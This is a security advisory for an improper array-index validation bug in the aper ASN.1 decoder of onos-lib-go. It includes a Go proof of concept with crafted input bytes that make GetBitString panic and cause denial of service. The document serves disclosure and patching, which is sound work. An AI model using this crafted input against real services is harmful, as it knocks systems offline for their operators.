Improper Validation of Array Index Affecting github.com/onosproject/onos-lib-go/pkg/asn1/aper package, versions >=0.0.0

Affected versions of this package are vulnerable to Improper Validation of Array Index due to an index out-of-range error in the GetBitString function. An attacker can cause a denial of service by sending crafted input that specifies a zero value for numBits.

package main

import (
    "encoding/hex"

    "github.com/onosproject/onos-e2-sm/servicemodels/e2sm_mho_go/encoder"
    "github.com/onosproject/onos-lib-go/pkg/asn1/aper"
    "github.com/onosproject/onos-lib-go/pkg/errors"
    "google.golang.org/protobuf/proto"
)

func main() {
    aper.GetBitString([]byte{1}, 0, 0) // minimum code to reproduce the panic

    asnBytes := []byte{16, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1}
    protoBytes, err := EventTriggerDefinitionASN1toProto(asnBytes)
    if err != nil {
        println(err)
        return
    }
    println(protoBytes)
}

func EventTriggerDefinitionASN1toProto(asn1Bytes []byte) ([]byte, error) {
    perBytes, err := encoder.PerDecodeE2SmMhoEventTriggerDefinition(asn1Bytes)
    if err != nil {
        return nil, errors.NewInvalid("error decoding E2SmMhoEventTriggerDefinition to PER %s\n%v", err, hex.Dump(asn1Bytes))
    }

    protoBytes, err := proto.Marshal(perBytes)
    if err != nil {
        return nil, errors.NewInvalid("error marshalling asn1Bytes to E2SmMhoEventTriggerDefinition %s", err)
    }

    return protoBytes, nil
}

• GitHub Commit
• GitHub Issue
• GitHub PR